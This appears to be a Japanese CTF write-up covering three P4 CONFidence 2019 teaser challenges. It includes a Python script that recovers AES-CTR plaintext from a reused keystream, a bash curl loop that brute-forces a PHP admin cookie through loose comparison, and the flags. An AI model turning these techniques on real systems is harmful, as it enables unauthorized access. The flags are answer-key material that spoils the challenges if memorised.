CTF日本語サイト

Count me in!

Points: 500

Solves: 1

I've been lately using this cool AES-CTR, but it was super slow, so I made a parallel version. Now it's blazing fast, but for some reason I have trouble decrypting the data...

count_me_in.tar.gz 2.2 KB

import multiprocessing

from Crypto.Cipher import AES

from secret import key, flag

counter = 0

aes = AES.new(key, AES.MODE_ECB)

def chunk(input_data, size):

    return [input_data[i:i + size] for i in range(0, len(input_data), size)]

def xor(*t):

    from functools import reduce

    from operator import xor

    return [reduce(xor, x, 0) for x in zip(*t)]

def xor_string(t1, t2):

    t1 = map(ord, t1)

    t2 = map(ord, t2)

    return "".join(map(chr, xor(t1, t2)))

def pad(data):

    pad_byte = 16 - len(data) % 16

    return data + (chr(pad_byte) * pad_byte)

def worker_function(block):

    global counter

    key_stream = aes.encrypt(pad(str(counter)))

    result = xor_string(block, key_stream)

    counter += 1

    return result

def distribute_work(worker, data_list, processes=8):

    pool = multiprocessing.Pool(processes=processes)

    result = pool.map(worker, data_list)

    pool.close()

    return result

def encrypt_parallel(plaintext, workers_number):

    chunks = chunk(pad(plaintext), 16)

    results = distribute_work(worker_function, chunks, workers_number)

    return "".join(results)

def main():

    plaintext = """The Song of the Count

You know that I am called the Count

Because I really love to count

I could sit and count all day

Sometimes I get carried away

I count slowly, slowly, slowly getting faster

Once I've started counting it's really hard to stop

Faster, faster. It is so exciting!

I could count forever, count until I drop

1! 2! 3! 4!

1-2-3-4, 1-2-3-4,

1-2, i love couning whatever the ammount haha!

1-2-3-4, heyyayayay heyayayay that's the sound of the count

I count the spiders on the wall...

I count the cobwebs in the hall...

I count the candles on the shelf...

When I'm alone, I count myself!

I count slowly, slowly, slowly getting faster

Once I've started counting it's really hard to stop

Faster, faster. It is so exciting!

I could count forever, count until I drop

1! 2! 3! 4!

1-2-3-4, 1-2-3-4, 1,

2 I love counting whatever the

ammount! 1-2-3-4 heyayayay heayayay 1-2-3-4

That's the song of the Count!

""" + flag

    encrypted = encrypt_parallel(plaintext, 32)

    print(encrypted.encode("hex"))

if __name__ == '__main__':

    multiprocessing.freeze_support()

    main()

9d5c66e65fae92af9c8a55d9d3bf640e

’The Song of the '

54686520536f6e67206f662074686520

c93403c60cc1fcc8bce533f9a7d7012e

import binascii

def xor(*t):

    from functools import reduce

    from operator import xor

    return [reduce(xor, x, 0) for x in zip(*t)]

def xor_string(t1, t2):

    t1 = map(ord, t1)

    t2 = map(ord, t2)

    return "".join(map(chr, xor(t1, t2)))

def decrypt(no):

encry = s[no*32:no*32+32]

plain = plaintext[no*16:no*16+16]

key_stream = xor_string(binascii.unhexlify(encry), plain)

for enc in l:

plain = xor_string(binascii.unhexlify(enc), key_stream)

print([plain])

plaintext = """The Song of the Count

You know that I am called the Count

Because I really love to count

I could sit and count all day

Sometimes I get carried away

I count slowly, slowly, slowly getting faster

Once I've started counting it's really hard to stop

Faster, faster. It is so exciting!

I could count forever, count until I drop

1! 2! 3! 4!

1-2-3-4, 1-2-3-4,

1-2, i love couning whatever the ammount haha!

1-2-3-4, heyyayayay heyayayay that's the sound of the count

I count the spiders on the wall...

I count the cobwebs in the hall...

I count the candles on the shelf...

When I'm alone, I count myself!

I count slowly, slowly, slowly getting faster

Once I've started counting it's really hard to stop

Faster, faster. It is so exciting!

I could count forever, count until I drop

1! 2! 3! 4!

1-2-3-4, 1-2-3-4, 1,

2 I love counting whatever the

ammount! 1-2-3-4 heyayayay heayayay 1-2-3-4

That's the song of the Count!

"""

f = open('output.txt')

s = f.read()

f.close()

l = [s[i: i+32] for i in range(0, len(s), 32)]

decrypt(0)

decrypt(10)

decrypt(20)

decrypt(30)

decrypt(39)

decrypt(49)

decrypt(54)

decrypt(55)

$ python bbb.py

['The Song of the ']

['Count\n\nYou know ']

['that I am called']

[' the Count\nBecau']

['se I really love']

[' to count\nI coul']

['d sit and count ']

['all day\nSometime']

['s I get carried ']

['away\nI count slo']

(略)

['wly, slowly, slo']

['wly getting fast']

["er\nOnce I've sta"]

['rted counting it']

["'s really hard t"]

['o stop\nFaster, f']

['aster. It is so ']

['exciting!\nI coul']

['d count forever,']

[' count until I d']

(略)

['rop\n1! 2! 3! 4!\n']

['1-2-3-4, 1-2-3-4']

[',\n1-2, i love co']

['uning whatever t']

['he ammount haha!']

['\n1-2-3-4, heyyay']

['ayay heyayayay t']

["hat's the sound "]

['of the count\nI c']

['ount the spiders']

(略)

[' on the wall...\n']

['I count the cobw']

['ebs in the hall.']

['..\nI count the c']

['andles on the sh']

["elf...\nWhen I'm "]

['alone, I count m']

['yself!\nI count s']

['lowly, slowly, s']

['\n\xa4\x17\x84\x1aDc\xd5\xbbN\x84\x05=q3_']

["ster\nOnce I've s"]

(略)

['lowly getting fa']

['\x15\xbf\x05\x9ai+j\xd3\xaa\x1a\xa4L,4uM']

['tarted counting ']

["it's really hard"]

[' to stop\nFaster,']

[' faster. It is s']

['o exciting!\nI co']

['uld count foreve']

['r, count until I']

[' drop\n1! 2! 3! 4']

['\x7f\xc8\xf6\xda\xdb\x8c4\x9f\xed\xf5\x12\x07\xb1\xb9\xac\xf2']

['-4, 1,\n2 I love ']

(略)

['!\n1-2-3-4, 1-2-3']

['s\xf6\xeb\xd7\xd8\x8d\r\x80\xf9\x90\x12Z\xf3\xfd\xe4\xe1']

['counting whateve']

['r the\nammount! 1']

['-2-3-4 heyayayay']

['^l\xebK\x13\x91\x97\xff\x94F\x80\xc0\xf7d\x16U']

['\xb2\xecR\xf0\x05*\x8ez\xe0{,|.\xf5\xde\xf6']

['g of the Count!\n']

(略)
[' heayayay 1-2-3-']

['\xcc\xe8\xdc\xdao\xda`\xe4\r\x1d\x9d\x91\xeb\xbc\xfb\x8e']

['\x19$\xe1LJ\x84\x86\xfb\xcd%\xde\x98\xab=\x04r']

['p4{at_the_end_of']

['_the_day_you_can']

(略)

["4\nThat's the son"]

['\xe1\xc6i\xfeD*\xc1l\xe0L+l`\xf2\x90\x92']

['\x88\xd6\xf3\xd3z\xf13\xffH6\x90\x9a\xaf\x90\xfb\x86']

['\xa7\x96\xe0\xd7Q\xca&\xeer\x10\x9a\x81\x94\xac\xf5\x8e']

['_only_count_on_y']

['ourself}\x08\x08\x08\x08\x08\x08\x08\x08']

p4{at_the_end_of_the_day_you_can_only_count_on_yourself}

です。

暗号技術の教科書 [単行本（ソフトカバー）]

吹田 智章

ラトルズ

2018-12-21

My admin panel

Points: 77

Solves: 74

I think I've found something interesting, but I'm not really a PHP expert. Do you think it's exploitable?

https://gameserver.zajebistyc.tf/admin/

<?php

include '../func.php';

include '../config.php';

if (!$_COOKIE['otadmin']) {

    exit("Not authenticated.\n");

}

if (!preg_match('/^{"hash": [0-9A-Z\"]+}$/', $_COOKIE['otadmin'])) {

    echo "COOKIE TAMPERING xD IM A SECURITY EXPERT\n";

    exit();

}

$session_data = json_decode($_COOKIE['otadmin'], true);

if ($session_data === NULL) { echo "COOKIE TAMPERING xD IM A SECURITY EXPERT\n"; exit(); }

if ($session_data['hash'] != strtoupper(MD5($cfg_pass))) {

    echo("I CAN EVEN GIVE YOU A HINT XD \n");

    for ($i = 0; i < strlen(MD5('xDdddddd')); i++) {

        echo(ord(MD5($cfg_pass)[$i]) & 0xC0);

    }

    exit("\n");

}

display_admin();

cookieに{"hash": "0123456789ABCDEF"}をセットしてアクセスしてみます。下図のようにヒントが表示されます。

for i in `seq 0 999`

do

    echo $i

    out=`curl gameserver.zajebistyc.tf/admin/login.php -b "otadmin={\"hash\": $i"}`

    echo $out

    if [ "`echo $out | grep p4{`" ]; then break; fi

done

0

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current

                                 Dload  Upload   Total   Spent    Left  Speed

100    78    0    78    0     0    120      0 --:--:-- --:--:-- --:--:--   120

I CAN EVEN GIVE YOU A HINT XD 0006464640640064000646464640006400640640646400

(略)

389

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current

                                 Dload  Upload   Total   Spent    Left  Speed

100    58    0    58    0     0    160      0 --:--:-- --:--:-- --:--:--   160

Congratulations! p4{wtf_php_comparisons_how_do_they_work}

p4{wtf_php_comparisons_how_do_they_work}

TECHNICAL MASTER はじめてのPHPプロフェッショナル開発 PHP7対応 [単行本]

伊藤 翔

秀和システム

2019-02-26

Sanity check

Points: 1

Solves: 132

You can find the flag in the topic of our IRC channel linked below.

20:14 チャンネルに入りました

20:14 *xxxxxx join #p4team (~xxxxxx@yyy.zzz)

20:14 *topic : Teaser lasts from March 16th 11:00UTC to March 17th 11:00UTC | https://confidence2019.p4.team | p4{thanks_for_playing_:)}

p4{thanks_for_playing_:)}

です。

ARKARTECH G2000 ゲーミング ヘッドセット ヘッドホン ヘッドフォン ゲームヘッドセット マイク付き ゲーム用 PC パソコン スカイプ fps 対応 男女兼用 プレゼント ブルー [エレクトロニクス]

KOTION EACH